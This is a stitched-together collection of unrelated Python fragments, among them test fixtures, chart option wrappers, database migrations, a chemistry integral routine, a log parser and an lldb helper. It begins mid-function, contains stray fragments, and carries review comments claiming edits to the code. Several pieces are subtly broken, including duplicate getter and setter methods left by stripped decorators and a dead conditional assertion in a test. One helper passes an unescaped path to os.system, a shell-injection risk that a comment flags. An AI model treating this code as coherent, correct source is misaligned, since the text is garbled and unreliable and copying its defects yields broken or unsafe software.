            except subprocess.CalledProcessError:
                assert False, '{} service installation failed'.format(service)
        if (installation_type == 'make'):
            clone_make_install()
        elif (installation_type == 'package'):
            # Install the pre-built distro package (apt/yum per PKG_MGR).
            try:
                subprocess.run(['sudo {} install -y fledge-service-{}'.format(pytest.PKG_MGR, service)], shell=True, check=True)
            except subprocess.CalledProcessError:
                assert False, '{} package installation failed!'.format(service)
        else:
            # Unknown installation mechanism: skip installing entirely.
            return 'Skipped {} service installation. Installation mechanism is set to {}.'.format(service, installation_type)
        # Register the freshly installed service with the Fledge core API.
        data = {'name': '{}'.format(service_name), 'type': '{}'.format(service), 'enabled': enabled}
        retval = utils.post_request(fledge_url, '/fledge/service', data)
        assert (service_name == retval['name'])
        return retval
    return _add_service
def extractMegruminatesWordpressCom(item):
    """Parse a feed item from megruminates.wordpress.com.

    Maps known tags to release messages; returns None for previews or posts
    without chapter/volume info, False when no known tag matches.
    """
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    # Ignore preview posts and posts with no chapter/volume information.
    if 'preview' in item['title'].lower() or not (chp or vol):
        return None
    tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
    for tagname, name, tl_type in tagmap:
        if tagname not in item['tags']:
            continue
        return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
def COMMETHOD(idlflags, restype, methodname, *argspec):
    """Build a _ComMemberSpec describing one COM interface method.

    Property accessors get a prefixed internal name (_get_/_set_/_setref_)
    derived from the first matching idl flag; plain methods keep their name.
    """
    helptext = ''.join(t for t in idlflags if isinstance(t, helpstring)) or None
    paramflags, argtypes = _resolve_argspec(argspec)
    # First matching flag wins, in the same precedence order as before.
    name = methodname
    for flag, template in (('propget', '_get_%s'), ('propput', '_set_%s'), ('propputref', '_setref_%s')):
        if flag in idlflags:
            name = template % methodname
            break
    return _ComMemberSpec(restype, name, argtypes, paramflags, tuple(idlflags), helptext)
@settings(suppress_health_check=[HealthCheck.function_scoped_fixture])
@given(ecl_runs)
def test_gridprop_unrst_same_formatted(tmp_path, ecl_run):
    """A property read from a formatted restart (FUNRST) must equal the same
    property read from the original binary restart (UNRST).

    NOTE(review): the two decorator lines were garbled in this copy
    ('(suppress_health_check=...)' and '(ecl_runs)' stood alone, a syntax
    error); reconstructed as the conventional hypothesis @settings/@given
    pair -- confirm against the upstream source.
    """
    funrst = tmp_path / 'file.FUNRST'
    # Re-encode the binary restart file as a formatted one.
    resfo.write(funrst, resfo.read(ecl_run.unrst_file), resfo.Format.FORMATTED)
    ecl_run.unrst_file.seek(0)
    funrst_gridprop = xtgeo.gridproperty_from_file(funrst, fformat='funrst', name=ecl_run.property_name, grid=ecl_run.grid, date=ecl_run.xtgeo_step_date)
    unrst_gridprop = xtgeo.gridproperty_from_file(ecl_run.unrst_file, fformat='unrst', name=ecl_run.property_name, grid=ecl_run.grid, date=ecl_run.xtgeo_step_date)
    assert unrst_gridprop.name == funrst_gridprop.name
    assert np.array_equal(unrst_gridprop.values, funrst_gridprop.values)
class FunctionalModule():
    """Plain record describing a named, callable module.

    Attributes:
        name: short identifier for the module.
        description: human-readable summary of what the callable does.
        method: the callable itself.
        signature: mapping of parameter name to its schema dict.
    """

    name: str
    description: str
    method: Callable[..., Any]
    signature: dict[str, dict]

    def __init__(self, name, description, method, signature):
        # Store all metadata verbatim; no validation is performed.
        self.name, self.description = name, description
        self.method, self.signature = method, signature
class FileParamType(click.ParamType):
    """Click parameter type that validates local file paths into FlyteFile."""

    name = 'file path'

    def convert(self, value: typing.Any, param: typing.Optional[click.Parameter], ctx: typing.Optional[click.Context]) -> typing.Any:
        """Validate *value* and wrap it in a FlyteFile.

        Remote URIs are accepted as-is; local paths must point at an
        existing regular file.
        """
        # In remote mode let flytekit pick the upload location (None);
        # otherwise suppress uploading entirely (False).
        if getattr(ctx.obj, 'is_remote', False):
            remote_path = None
        else:
            remote_path = False
        if not FileAccessProvider.is_remote(value):
            candidate = pathlib.Path(value)
            if not (candidate.exists() and candidate.is_file()):
                raise click.BadParameter(f'parameter should be a valid file path, {value}')
        return FlyteFile(path=value, remote_path=remote_path)
def upgrade():
    # Alembic migration: create the 'regcode' table (id PK, binary password
    # hash, registration code string) plus a non-unique index on password.
    # NOTE(review): indexing a LargeBinary password column is unusual --
    # confirm the index is intentional.
    op.create_table('regcode', sa.Column('id', sa.Integer(), nullable=False), sa.Column('password', sa.LargeBinary(), nullable=False), sa.Column('code', sa.String(), nullable=False), sa.PrimaryKeyConstraint('id'))
    op.create_index(op.f('ix_regcode_password'), 'regcode', ['password'], unique=False)
def create_arnold_stand_in(path=None):
    """Create an Arnold aiStandIn node linked to the default light set.

    :param path: optional archive path assigned to the node's ``dso`` attr.
    :return: the newly created ``aiStandIn`` shape node.
    """
    # Create the shared light-linking set lazily, on first use.
    if not pm.objExists('ArnoldStandInDefaultLightSet'):
        pm.createNode('objectSet', name='ArnoldStandInDefaultLightSet', shared=True)
        pm.lightlink(object='ArnoldStandInDefaultLightSet', light='defaultLightSet')
    node = pm.createNode('aiStandIn', n='ArnoldStandInShape')
    # Make the stand-in participate in ray-traced reflections/refractions.
    for attr_name in ('visibleInReflections', 'visibleInRefractions'):
        node.setAttr(attr_name, True)
    pm.sets('ArnoldStandInDefaultLightSet', add=node)
    if path:
        node.setAttr('dso', path)
    return node
class OptionSeriesSplineStatesInactive(Options):
    # Generated Highcharts option wrapper for `series.spline.states.inactive`.
    # NOTE(review): each getter/setter pair below shares one name; the
    # upstream generator emits these as @property/@<name>.setter pairs and
    # the decorators appear stripped from this copy -- as written, only the
    # last definition of each name survives.  Confirm against the generator.

    def animation(self) -> 'OptionSeriesSplineStatesInactiveAnimation':
        # Sub-options object controlling the inactive-state fade animation.
        return self._config_sub_data('animation', OptionSeriesSplineStatesInactiveAnimation)

    def enabled(self):
        # Highcharts default: inactive-state dimming is on.
        return self._config_get(True)

    def enabled(self, flag: bool):
        self._config(flag, js_type=False)

    def opacity(self):
        # Highcharts default opacity applied to inactive series.
        return self._config_get(0.2)

    def opacity(self, num: float):
        self._config(num, js_type=False)
def _get_feature_subfeature_phase():
    """Build sorted pytest params of (feature, subfeature, phase).

    Provider names are dropped and duplicates removed before marking each
    param with its feature and subfeature pytest marks.
    """
    # Deduplicate (feature, subfeature, phase) triples across providers.
    triples = set()
    for provider, feature, subfeature, *phase in list_features():
        triples.add((feature, subfeature, phase[0] if phase else ''))
    params = []
    for feature, subfeature, phase in triples:
        marks = [getattr(pytest.mark, feature), getattr(pytest.mark, subfeature)]
        params.append(pytest.param(feature, subfeature, phase, marks=marks))
    # Sort for a deterministic collection order.
    return sorted(params)
def dipole3d_20(ax, da, A, bx, db, B, R):
    """Machine-generated dipole integral block between Gaussian shells.

    Computes the (2,0) cartesian angular-momentum case: bra shell at center
    A with exponents ``ax``/coefficients ``da``, ket shell at center B with
    ``bx``/``db``, multipole origin at R.  Returns an array of shape
    (3 dipole components, 6 cartesian bra functions, 1 ket function).

    NOTE(review): the x0..x31 intermediates come from symbolic
    common-subexpression elimination -- do not hand-edit them.
    """
    result = numpy.zeros((3, 6, 1), dtype=float)
    # x0 = 1/(ax+bx); x1/x10/x15 are the Gaussian product center coords.
    x0 = ((ax + bx) ** (- 1.0))
    x1 = (x0 * ((ax * A[0]) + (bx * B[0])))
    x2 = (- x1)
    x3 = (x2 + A[0])
    x4 = (x2 + R[0])
    x5 = (x3 * x4)
    x6 = ((ax * bx) * x0)
    # x7: contracted prefactor including the Gaussian overlap exponential.
    x7 = ((((5. * da) * db) * (x0 ** 1.5)) * numpy.exp(((- x6) * ((((A[0] - B[0]) ** 2) + ((A[1] - B[1]) ** 2)) + ((A[2] - B[2]) ** 2)))))
    x8 = (1. * x7)
    x9 = (0. * x8)
    x10 = (x0 * ((ax * A[1]) + (bx * B[1])))
    x11 = (- x10)
    x12 = (x11 + A[1])
    x13 = (0.5 * x0)
    x14 = (x7 * (x13 + x5))
    x15 = (x0 * ((ax * A[2]) + (bx * B[2])))
    x16 = (- x15)
    x17 = (x16 + A[2])
    x18 = ((x12 ** 2) + x13)
    x19 = (0. * x8)
    x20 = (x19 * x4)
    x21 = (x17 * x7)
    x22 = (x13 + (x17 ** 2))
    x23 = (x13 + (x3 ** 2))
    x24 = (x11 + R[1])
    x25 = (x19 * x24)
    x26 = (x12 * x24)
    x27 = (x7 * (x13 + x26))
    x28 = (x16 + R[2])
    x29 = (x19 * x28)
    x30 = (x17 * x28)
    x31 = (x7 * (x13 + x30))
    # Assemble the 3 x 6 block; numpy.sum contracts over primitives.
    result[(0, 0, 0)] = numpy.sum(((- x9) * ((x0 * ((((- 2.0) * x1) + A[0]) + R[0])) + (x3 * (x0 + (2.0 * x5))))))
    result[(0, 1, 0)] = numpy.sum(((- x12) * x14))
    result[(0, 2, 0)] = numpy.sum(((- x14) * x17))
    result[(0, 3, 0)] = numpy.sum(((- x18) * x20))
    result[(0, 4, 0)] = numpy.sum((((- x12) * x21) * x4))
    result[(0, 5, 0)] = numpy.sum(((- x20) * x22))
    result[(1, 0, 0)] = numpy.sum(((- x23) * x25))
    result[(1, 1, 0)] = numpy.sum(((- x27) * x3))
    result[(1, 2, 0)] = numpy.sum((((- x21) * x24) * x3))
    result[(1, 3, 0)] = numpy.sum(((- x9) * ((x0 * ((((- 2.0) * x10) + A[1]) + R[1])) + (x12 * (x0 + (2.0 * x26))))))
    result[(1, 4, 0)] = numpy.sum(((- x17) * x27))
    result[(1, 5, 0)] = numpy.sum(((- x22) * x25))
    result[(2, 0, 0)] = numpy.sum(((- x23) * x29))
    result[(2, 1, 0)] = numpy.sum(((((- x12) * x28) * x3) * x7))
    result[(2, 2, 0)] = numpy.sum(((- x3) * x31))
    result[(2, 3, 0)] = numpy.sum(((- x18) * x29))
    result[(2, 4, 0)] = numpy.sum(((- x12) * x31))
    result[(2, 5, 0)] = numpy.sum(((- x9) * ((x0 * ((((- 2.0) * x15) + A[2]) + R[2])) + (x17 * (x0 + (2.0 * x30))))))
    return result
class TestSinkMethodCompatibility():
    """Sync/async sinks must only be accepted by the matching app flavor."""

    def _verify_kitchen_sink(self, client):
        # The catch-all sink should answer any method, even non-standard ones.
        resp = client.simulate_request('BREW', '/features')
        assert resp.status_code == 200
        assert resp.headers.get('X-Missing-Feature') == 'kitchen-sink'

    def test_add_async_sink(self, client, asgi):
        if asgi:
            client.app.add_sink(async_kitchen_sink, '/features')
            self._verify_kitchen_sink(client)
        else:
            # A WSGI app must reject coroutine sinks outright.
            with pytest.raises(falcon.CompatibilityError):
                client.app.add_sink(async_kitchen_sink)

    def test_add_sync_sink(self, client, asgi):
        if not asgi:
            client.app.add_sink(kitchen_sink, '/features')
            self._verify_kitchen_sink(client)
        else:
            # With auto-wrapping disabled, an ASGI app must reject sync sinks.
            with disable_asgi_non_coroutine_wrapping():
                with pytest.raises(falcon.CompatibilityError):
                    client.app.add_sink(kitchen_sink)

    def test_add_sync_sink_with_wrapping(self, client, asgi):
        # Default behavior: ASGI wraps the sync sink automatically; WSGI
        # accepts it natively -- both must serve the sink.
        client.app.add_sink(kitchen_sink, '/features')
        self._verify_kitchen_sink(client)
def any_of(*exprs, **kwargs):
    """Build a MatchAny/MatchFirst alternation over *exprs*.

    Same-type, action-free alternations are flattened into the new one.
    Keyword args: use_adaptive (default use_adaptive_any_of), and, in
    DEVELOP builds only, reverse (default reverse_any_of).
    """
    use_adaptive = (kwargs.pop('use_adaptive', use_adaptive_any_of) and SUPPORTS_ADAPTIVE)
    reverse = reverse_any_of
    if DEVELOP:
        # 'reverse' is only overridable in development builds.
        reverse = kwargs.pop('reverse', reverse)
    internal_assert((not kwargs), 'excess keyword arguments passed to any_of', kwargs)
    AnyOf = (MatchAny if use_adaptive else MatchFirst)
    flat_exprs = []
    for e in exprs:
        # Flatten nested alternations of the same class with no parse
        # actions; skipped when reversing a non-adaptive match.
        if ((not (reverse and (not use_adaptive))) and (e.__class__ == AnyOf) and (not hasaction(e))):
            flat_exprs.extend(e.exprs)
        else:
            flat_exprs.append(e)
    if reverse:
        # NOTE(review): this rebuilds from the original 'exprs', discarding
        # any flattening performed above -- confirm that 'exprs' (rather
        # than 'flat_exprs') is intentional when use_adaptive is True.
        flat_exprs = reversed([trace(e) for e in exprs])
    return AnyOf(flat_exprs)
_dict
    def __new__(cls, value):
        """Resolve *value* to an existing member (enum lookup-by-value)."""
        if (NoAlias in cls._settings_):
            # NoAlias enums may share values, so by-value lookup is ambiguous.
            raise TypeError('NoAlias enumerations cannot be looked up by value')
        if (type(value) is cls):
            # Already a member of this enum: return it unchanged.
            return value
        try:
            # Fast path: hashable values resolve via the value->member map.
            return cls._value2member_map_[value]
        except KeyError:
            pass
        except TypeError:
            # Unhashable value: fall back to a linear scan over the pairs.
            for (member_value, member) in cls._value2member_seq_:
                if (member_value == value):
                    return member
        # Not found: let the class synthesize or translate the value.
        result = cls._missing_value_(value)
        if isinstance(result, cls):
            return result
        elif ((result is not None) and (getattr(cls, '_boundary_', None) is EJECT)):
            # EJECT boundary allows returning a raw, non-member result.
            return result
        elif (result is None):
            if (value is no_arg):
                raise ValueError(('%s() should be called with a value' % (cls.__name__,)))
            else:
                raise ValueError(('%r is not a valid %s' % (value, cls.__name__)))
        else:
            # _missing_ returned something that is neither None nor a member.
            raise TypeError(('error in %s._missing_: returned %r instead of None or a valid member' % (cls.__name__, result)))
class Naws():
    """Telnet NAWS (Negotiate About Window Size, RFC 1073) handler.

    Registers itself on the protocol, seeds default screen dimensions, and
    updates them when the client reports its window size.
    """

    def __init__(self, protocol):
        self.naws_step = 0
        self.protocol = protocol
        flags = self.protocol.protocol_flags
        flags['SCREENWIDTH'] = {0: DEFAULT_WIDTH}
        flags['SCREENHEIGHT'] = {0: DEFAULT_HEIGHT}
        self.protocol.negotiationMap[NAWS] = self.negotiate_sizes
        self.protocol.do(NAWS).addCallbacks(self.do_naws, self.no_naws)

    def no_naws(self, option):
        # Client refused NAWS: keep the defaults and finish the handshake.
        self.protocol.handshake_done()

    def do_naws(self, option):
        # Client accepted NAWS: sizes will arrive via negotiate_sizes.
        self.protocol.handshake_done()

    def negotiate_sizes(self, options):
        """Decode WIDTH/HEIGHT (two 16-bit big-endian values) from *options*."""
        if len(options) != 4:
            return
        flags = self.protocol.protocol_flags
        flags['SCREENWIDTH'][0] = int(codecs_encode(options[0] + options[1], 'hex'), 16)
        flags['SCREENHEIGHT'][0] = int(codecs_encode(options[2] + options[3], 'hex'), 16)
class Menu(models.Model):
    # Site menu / landing-page section model.
    # NOTE(review): the verbose_name/help_text values below are empty or a
    # bare 'slogan' -- the original (likely non-ASCII) admin labels appear
    # to have been stripped from this copy; restore them from upstream.
    nid = models.AutoField(primary_key=True)
    menu_title = models.CharField(verbose_name='', max_length=16, null=True)
    menu_title_en = models.CharField(verbose_name='', max_length=32, null=True)
    title = models.CharField(verbose_name='slogan', max_length=32, null=True)
    abstract = models.TextField(verbose_name='slogan', help_text='', null=True)
    # Seconds each abstract is shown when rotating (default 8).
    abstract_time = models.IntegerField(verbose_name='slogan', help_text=',8', default=8)
    rotation = models.BooleanField(verbose_name='slogan', default=True)
    # Banner images attached to this menu entry.
    menu_url = models.ManyToManyField(to='MenuImg', verbose_name='', help_text=',')
    menu_rotation = models.BooleanField(verbose_name='banner', help_text='', default=False)
    menu_time = models.IntegerField(verbose_name='', help_text=',8', default=8)
    class Meta():
        verbose_name_plural = ''
class ViewerSession(object):
    """Per-user archive browsing session with idle-based pruning."""

    archFiles = None
    items = None

    def __init__(self):
        self.archHandle = None
        self.lastAccess = time.time()
        # Sessions idle for two hours become eligible for pruning.
        self.pruneAge = 60 * 120

    def shouldPrune(self):
        """Return True when the session has been idle longer than pruneAge."""
        idle = time.time() - self.lastAccess
        return idle > self.pruneAge

    def checkOpenArchive(self, archPath):
        """Ensure the archive at *archPath* is open, reopening on change."""
        if not self.archHandle or self.archHandle.archPath != archPath:
            self.archHandle = ArchiveReader(archPath)
        self.lastAccess = time.time()

    def getItemByInternalPath(self, internalPath):
        """Return (opened item content, its internal path) from the archive."""
        return self.archHandle.open(internalPath), internalPath

    def __del__(self):
        # Drop the archive handle eagerly so the file closes promptly.
        if self.archHandle:
            del self.archHandle
def lazy_import():
    """Import cross-referenced fastly models on demand.

    Publishing them through globals() breaks circular-import cycles between
    generated model modules.
    """
    from fastly.model.service_invitation_data_attributes import ServiceInvitationDataAttributes
    globals()['ServiceInvitationDataAttributes'] = ServiceInvitationDataAttributes
    from fastly.model.service_invitation_data_relationships import ServiceInvitationDataRelationships
    globals()['ServiceInvitationDataRelationships'] = ServiceInvitationDataRelationships
    from fastly.model.type_service_invitation import TypeServiceInvitation
    globals()['TypeServiceInvitation'] = TypeServiceInvitation
def read_event(io, metadata):
    """Parse one Process Monitor log event record from stream *io*.

    *metadata* supplies process lookup, pointer size and the stacktrace
    policy.  Returns a populated Event; its category/path/details fields
    are filled in by get_event_details.
    """
    (process_idx, tid, event_class_val, operation_val, _, _, duration, date, result, stacktrace_depth, _, details_size, extra_details_offset) = CommonEventStruct.unpack(io.read(CommonEventStruct.size))
    process = metadata.process_idx(process_idx)
    event_class = EventClass(event_class_val)
    operation = EventClassOperation[event_class](operation_val)
    # Stack frames are pointer-sized; skip the bytes when not requested.
    sizeof_stacktrace = (stacktrace_depth * metadata.sizeof_pvoid)
    if metadata.should_get_stacktrace:
        stream = BytesIO(io.read(sizeof_stacktrace))
        stacktrace = [metadata.read_pvoid(stream) for _ in range(stacktrace_depth)]
    else:
        io.seek(sizeof_stacktrace, 1)
        stacktrace = []
    details = OrderedDict()
    event = Event(process=process, tid=tid, event_class=event_class, operation=operation, duration=duration, date_filetime=date, result=result, stacktrace=stacktrace, category='', path='', details=details)
    details_stream = BytesIO(io.read(details_size))
    extra_details_stream = None
    if (extra_details_offset > 0):
        # The stored offset is relative to the record start; rebase it past
        # the header, details block and stacktrace already consumed.
        extra_details_offset -= ((CommonEventStruct.size + details_size) + sizeof_stacktrace)
        assert (extra_details_offset >= 0)
        current_offset = io.tell()
        io.seek(extra_details_offset, 1)
        extra_details_stream_size = read_u16(io)
        extra_details_stream = BytesIO(io.read(extra_details_stream_size))
        # Restore the position so the next record parses correctly.
        io.seek(current_offset, 0)
    get_event_details(details_stream, metadata, event, extra_details_stream)
    return event
def make_hashable(obj: Any) -> Tuple:
    """Recursively convert *obj* into an equivalent hashable value.

    Sequences become tuples, dicts become sorted (key, value) tuples, sets
    become sorted tuples, numpy arrays are converted via their nested-list
    form; anything else is returned unchanged.
    """
    if isinstance(obj, (tuple, list)):
        return tuple(make_hashable(item) for item in obj)
    if isinstance(obj, dict):
        pairs = ((key, make_hashable(val)) for key, val in obj.items())
        return tuple(sorted(pairs))
    if isinstance(obj, (set, frozenset)):
        return tuple(sorted(make_hashable(item) for item in obj))
    if isinstance(obj, np.ndarray):
        # Arrays are unhashable; recurse over their nested-list contents.
        return make_hashable(obj.tolist())
    return obj
class TestParaphrase(unittest.TestCase):
    """Sanity checks for the Paraphrase prompt perturber."""

    def setUp(self) -> None:
        # Low temperature keeps paraphrases close to the source prompt.
        self.num_perturbations = 4
        self.perturber = Paraphrase(num_perturbations=self.num_perturbations, temperature=0.1)
        return

    def test_paraphrase(self):
        # Every prompt must yield exactly the requested paraphrase count.
        for prompt in TRUTHFUL_DATASET:
            sim_prompt = self.perturber.transform(prompt)
            error_msg = f'Expected {self.num_perturbations} parphrases received {len(sim_prompt)}'
            self.assertEqual(len(sim_prompt), self.num_perturbations, error_msg) if False else None
            assert len(sim_prompt) == self.num_perturbations, error_msg
        return
class IPv4Dscp(MatchTest):
    """OpenFlow match test on the IPv4 DSCP field (upper 6 ToS bits)."""

    def runTest(self):
        match = ofp.match([ofp.oxm.eth_type(2048), ofp.oxm.ip_dscp(4)])
        # ToS = (DSCP << 2) | ECN, so DSCP 4 corresponds to ToS 16..19.
        matching = {
            'dscp=4 ecn=0': simple_tcp_packet(ip_tos=16),
            'dscp=4 ecn=3': simple_tcp_packet(ip_tos=19),
        }
        nonmatching = {
            'dscp=5 ecn=0': simple_tcp_packet(ip_tos=20),
        }
        self.verify_match(match, matching, nonmatching)
def upgrade():
    # Alembic data migration: mark the standard session and speaker custom
    # form fields as publicly visible, and retitle the attendee 'company'
    # field to 'Organisation'.  Raw SQL is used because only data changes.
    op.execute("UPDATE custom_forms SET is_public=True WHERE form='session' and (field_identifier='title' or field_identifier='subtitle' or field_identifier='shortAbstract' or field_identifier='longAbstract' or field_identifier='level' or field_identifier='track' or field_identifier='sessionType' or field_identifier='language' or field_identifier='slidesUrl' or field_identifier='videoUrl' or field_identifier='audioUrl');")
    op.execute("UPDATE custom_forms SET is_public=True WHERE form='speaker' and (field_identifier='name' or field_identifier='photoUrl' or field_identifier='position' or field_identifier='country' or field_identifier='shortBiography' or field_identifier='longBiography' or field_identifier='website' or field_identifier='facebook' or field_identifier='github' or field_identifier='twitter' or field_identifier='linkedin' or field_identifier='instagram');")
    op.execute("UPDATE custom_forms SET name='Organisation' WHERE form='attendee' and (field_identifier='company');")
def pie_chart():
    """Build a flet PieChart demo whose hovered section grows and restyles."""
    normal_radius = 100
    hover_radius = 110
    normal_title_style = ft.TextStyle(size=12, color=ft.colors.WHITE, weight=ft.FontWeight.BOLD)
    hover_title_style = ft.TextStyle(size=16, color=ft.colors.WHITE, weight=ft.FontWeight.BOLD, shadow=ft.BoxShadow(blur_radius=2, color=ft.colors.BLACK54))
    normal_badge_size = 40
    hover_badge_size = 50
    def badge(icon, size):
        # Circular icon container used as a per-section badge.
        return ft.Container(ft.Icon(icon), width=size, height=size, border=ft.border.all(1, ft.colors.BROWN), border_radius=(size / 2), bgcolor=ft.colors.WHITE)
    def on_chart_event(e: ft.PieChartEvent):
        # Enlarge only the hovered section; reset all the others.
        for (idx, section) in enumerate(chart.sections):
            if (idx == e.section_index):
                section.radius = hover_radius
                section.title_style = hover_title_style
            else:
                section.radius = normal_radius
                section.title_style = normal_title_style
        chart.update()
    chart = ft.PieChart(sections=[ft.PieChartSection(40, title='40%', title_style=normal_title_style, color=ft.colors.BLUE, radius=normal_radius, badge=badge(ft.icons.AC_UNIT, normal_badge_size), badge_position=0.98), ft.PieChartSection(30, title='30%', title_style=normal_title_style, color=ft.colors.YELLOW, radius=normal_radius, badge=badge(ft.icons.ACCESS_ALARM, normal_badge_size), badge_position=0.98), ft.PieChartSection(15, title='15%', title_style=normal_title_style, color=ft.colors.PURPLE, radius=normal_radius, badge=badge(ft.icons.APPLE, normal_badge_size), badge_position=0.98), ft.PieChartSection(15, title='15%', title_style=normal_title_style, color=ft.colors.GREEN, radius=normal_radius, badge=badge(ft.icons.PEDAL_BIKE, normal_badge_size), badge_position=0.98)], sections_space=0, center_space_radius=0, on_chart_event=on_chart_event, expand=True)
    return ft.Column(controls=[ft.Container(content=chart, padding=10)])
def main():
    """Convert a CSV of lidar points into an MCAP file with one JSON-encoded
    foxglove.PointCloud channel, emitting ten frames at 10 Hz.

    FIX: log_time/publish_time were computed as ``int(ts * .0)`` -- always 0.
    MCAP timestamps are nanoseconds since the epoch, so scale by 1e9.
    """
    parser = argparse.ArgumentParser(description=__doc__)
    parser.add_argument('csv', help='The input CSV to read')
    parser.add_argument('--output', '-o', default='out.mcap', help='The MCAP output path to write')
    args = parser.parse_args()
    pointcloud: typing.Dict[str, typing.Any]
    # foxglove.PackedElementField numeric type id for FLOAT32.
    float32 = 7
    # Four packed float32 fields per point: x, y, z, intensity.
    pointcloud = {'point_stride': (4 + 4 + 4 + 4), 'fields': [{'name': 'x', 'offset': 0, 'type': float32}, {'name': 'y', 'offset': 4, 'type': float32}, {'name': 'z', 'offset': 8, 'type': float32}, {'name': 'i', 'offset': 12, 'type': float32}]}
    points = bytearray()
    base_timestamp = None
    for point_timestamp, intensity, x, y, z in point_reader(args.csv):
        if base_timestamp is None:
            base_timestamp = point_timestamp
        points.extend(struct.pack('<ffff', x, y, z, intensity))
    assert base_timestamp is not None, 'found no points in input csv'
    # JSON cannot carry raw bytes: base64-encode the packed point buffer.
    pointcloud['data'] = base64.b64encode(points).decode('utf-8')
    pointcloud['pose'] = {'position': {'x': 0, 'y': 0, 'z': 0}, 'orientation': {'x': 0, 'y': 0, 'z': 0, 'w': 1}}
    pointcloud['frame_id'] = 'lidar'
    with open(args.output, 'wb') as f:
        writer = Writer(f)
        writer.start()
        with open((Path(__file__).parent / 'PointCloud.json'), 'rb') as schema_file:
            schema = schema_file.read()
        schema_id = writer.register_schema(name='foxglove.PointCloud', encoding=SchemaEncoding.JSONSchema, data=schema)
        channel_id = writer.register_channel(topic='pointcloud', message_encoding=MessageEncoding.JSON, schema_id=schema_id)
        for i in range(10):
            frame_timestamp = base_timestamp + datetime.timedelta(seconds=(i / 10.0))
            pointcloud['timestamp'] = {'sec': int(frame_timestamp.timestamp()), 'nsec': (frame_timestamp.microsecond * 1000)}
            # MCAP log/publish times are integer nanoseconds since epoch.
            time_ns = int(frame_timestamp.timestamp() * 1e9)
            writer.add_message(channel_id, log_time=time_ns, data=json.dumps(pointcloud).encode('utf-8'), publish_time=time_ns)
        writer.finish()
class OptionSeriesDependencywheelZones(Options):
    # Generated Highcharts option wrapper for `series.dependencywheel.zones`.
    # NOTE(review): each getter/setter pair below shares one name; the
    # upstream generator emits these as @property/@<name>.setter pairs and
    # the decorators appear stripped from this copy -- as written, only the
    # last definition of each name survives.  Confirm against the generator.

    def className(self):
        # CSS class applied to the zone's graphic elements (default: none).
        return self._config_get(None)

    def className(self, text: str):
        self._config(text, js_type=False)

    def color(self):
        # Series color within this zone (default: inherit).
        return self._config_get(None)

    def color(self, text: str):
        self._config(text, js_type=False)

    def dashStyle(self):
        # Line dash style within this zone (default: inherit).
        return self._config_get(None)

    def dashStyle(self, text: str):
        self._config(text, js_type=False)

    def fillColor(self):
        # Fill color within this zone (default: inherit).
        return self._config_get(None)

    def fillColor(self, text: str):
        self._config(text, js_type=False)
def _migrate_items_to_ecommerce_item(log):
    """One-off migration: copy Shopify-linked Items into Ecommerce Item docs.

    Records progress/outcome on the given *log* document and flags the
    settings doctype once migration completes successfully.
    """
    shopify_fields = ['shopify_product_id', 'shopify_variant_id']
    for field in shopify_fields:
        # Nothing to migrate unless the legacy Shopify custom fields exist.
        if (not frappe.db.exists({'doctype': 'Custom Field', 'fieldname': field})):
            return
    items = _get_items_to_migrate()
    try:
        _create_ecommerce_items(items)
    except Exception:
        # Best-effort migration: persist the failure on the log and bail.
        log.status = 'Error'
        log.traceback = frappe.get_traceback()
        log.save()
        return
    # Mark migration as done so it is not attempted again.
    frappe.db.set_value(SETTING_DOCTYPE, SETTING_DOCTYPE, 'is_old_data_migrated', 1)
    log.status = 'Success'
    log.save()
class FBPrintApplicationDocumentsPath(fb.FBCommand):
    """Chisel/lldb command 'pdocspath': print and copy the app's Documents
    directory path, optionally opening it in Finder."""
    def name(self):
        return 'pdocspath'
    def description(self):
        return "Print application's 'Documents' directory path."
    def options(self):
        return [fb.FBCommandArgument(short='-o', long='--open', arg='open', boolean=True, default=False, help='open in Finder')]
    def run(self, arguments, options):
        # Foundation enum values, spliced as text into the lldb expression.
        NSDocumentDirectory = '9'
        NSUserDomainMask = '1'
        path = fb.evaluateExpressionValue((((('(NSString*)[NSSearchPathForDirectoriesInDomains(' + NSDocumentDirectory) + ', ') + NSUserDomainMask) + ', YES) lastObject]'))
        # lldb prints the value as <...> "/actual/path"; grab the quoted part.
        pathString = '{}'.format(path).split('"')[1]
        # SECURITY(review): pathString is interpolated into shell commands
        # below; a path containing quotes/metacharacters would break or
        # inject here -- consider subprocess with an argument list.
        cmd = 'echo {} | tr -d "\n" | pbcopy'.format(pathString)
        os.system(cmd)
        print(pathString)
        if options.open:
            os.system(('open ' + pathString))
class Movie(object):
    """Aggregates the Event clips that make up one recorded movie.

    NOTE(review): in this copy the @property / @<name>.setter decorators
    were stripped (duplicate method names; bare '_timestamp.setter' lines
    that raise NameError at class creation).  They are restored below based
    on internal usage -- e.g. ``self.items`` and ``self.sorted`` are read
    without being called -- confirm against the upstream source.
    """

    def __init__(self, filename=None):
        self._filename = filename
        self._start_timestamp = None   # explicit override, else derived
        self._end_timestamp = None     # explicit override, else derived
        self._duration = None          # explicit override, else derived
        self._events = {}              # event filename -> Event

    @property
    def filename(self):
        return self._filename

    @filename.setter
    def filename(self, value):
        self._filename = value

    def event(self, folder):
        """Return the Event stored under *folder*, or None."""
        return self._events.get(folder)

    def set_event(self, event_info: Event):
        """Add or replace an event, keyed by its filename."""
        self._events.update({event_info.filename: event_info})

    def item(self, value):
        # Alias for event() lookup.
        return self.event(value)

    @property
    def first_item(self):
        """The chronologically first event."""
        return self.event(self.sorted[0])

    @property
    def items(self):
        return self._events.items()

    @property
    def items_sorted(self):
        """Events ordered by their start timestamp."""
        return [self.event(name) for name in self.sorted]

    @property
    def start_timestamp(self):
        # Explicit override wins; empty movies report "now"; otherwise the
        # earliest event's start.
        if self._start_timestamp is not None:
            return self._start_timestamp
        if len(self.items) == 0:
            return datetime.now()
        return self.event(self.sorted[0]).start_timestamp

    @start_timestamp.setter
    def start_timestamp(self, value):
        self._start_timestamp = value

    @property
    def end_timestamp(self):
        if self._end_timestamp is not None:
            return self._end_timestamp
        if len(self.items) == 0:
            return self.start_timestamp
        # Start from the last-starting event, then take the max end across
        # all events (an earlier-starting clip can end later).
        end_timestamp = self.event(self.sorted[-1]).end_timestamp
        for _, event_info in self.items:
            if event_info.end_timestamp > end_timestamp:
                end_timestamp = event_info.end_timestamp
        return end_timestamp

    @end_timestamp.setter
    def end_timestamp(self, value):
        self._end_timestamp = value

    @property
    def duration(self):
